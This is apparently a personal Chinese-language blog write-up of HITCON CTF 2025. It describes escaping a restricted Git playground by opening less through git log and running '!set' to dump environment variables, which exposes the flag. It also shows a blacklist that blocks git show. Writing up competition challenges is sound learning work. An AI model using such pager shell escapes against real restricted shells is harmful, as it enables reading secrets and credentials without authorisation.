HITCON CTF 2025#

Welcome#

我以為 HITCON 2025 的時候 orange 說不讓 welcome 太無聊是在開玩笑，沒想到是真的 www
這題只要按下 Submit 就可以了，但問題鼠標移到 Submit 上方的時候 Submit 會到處亂跑 w
不知道其他人怎麼解的，但我鼠標跟一下就按到了 xd
沒截到圖 QQ

Misc#

git-playground#

這個程式讓使用者可以在 /work 目錄下執行部分 Git 指令和基本 Unix 指令
程式會初始化 Git repository，設置環境變數，並提供一個命令行介面

這題的run.sh 裡面提到 FLAG is in the environment variable
然後環境有 less ，可以在 git log 或 git show 的畫面中進入 less，但這一題不能用 git show，會因為黑名單顯示 Dont't try to hack me
less 支援 !command，允許在 less 裡執行指令，進而讀取環境變數

1
Initialized empty Git repository in /work/.git/
2
=====================================
3
Hello! Welcome to the Git playground!
4
=====================================
5
Enter your command: touch /work/a
6
Enter your command: git add /work/a
7
Enter your command: git commit -m a
8
[main (root-commit) 067483d] a
9
 1 file changed, 0 insertions(+), 0 deletions(-)
10
 create mode 100644 a
11
Enter your command: git show
12
Dont't try to hack me

git log 會呼叫 less 來瀏覽輸出

1
Enter your command: git log
2
commit 067483d857fe8b0710cb54993bf66503d313c46d (HEAD -> main)
3
Author: hitconctf <hitconctf@hitcon.com>
4
Date:   Sat Aug 23 16:07:27 2025 +0000
5

6
    a

透過 !set 來顯示 shell 當前環境變數

1
!set
2
COLUMNS='120'
3
FLAG='hitcon{Bu5yb0X_34511y_cR4sH_Wh3N_bu117_w17h_C14Ng?}'
4
FUNCNAME=''
5
GIT_EXEC_PATH='//libexec/git-core'
6
GIT_PREFIX=''
7
HOME='/root'
8
HOSTNAME='0ac8a0df4abe'
9
IFS='
10
'
11
LESS='-Rd'
12
LINENO=''
13
LOGNAME='root'
14
LV='-c'
15
MAIL='/var/spool/mail/root'
16
MOTD_SHOWN='pam'
17
OPTIND='1'
18
PATH='//libexec/git-core:/bin'
19
PPID='38266'
20
PS1='\w \$ '
21
PS2='> '
22
PS4='+ '
23
PWD='/work'
24
SHELL='/bin/sh'
25
SHLVL='3'
26
SSH_CLIENT='36.224.53.87 54338 22'
27
SSH_CONNECTION='36.224.53.87 54338 10.10.0.18 22'
28
SSH_TTY='/dev/pts/20'
29
TERM='xterm-256color'
30
USER='root'
31
!done  (press RETURN)

拿到 flag 了

1
hitcon{Bu5yb0X_34511y_cR4sH_Wh3N_bu117_w17h_C14Ng?}

好難啊 (╥﹏╥)
大比賽還是要多看看，本來以為打了幾場 CTF 應該算有學到一點皮毛，打完只覺得：我根本不會打 CTF
剩下的題目翻了都沒什麼想法，打比賽的時候還有點不舒服，有一半的比賽時間都在睡覺 www
再多練一下 QQ
下個 CTF 見~

UTCSSA Official

Carbon Diary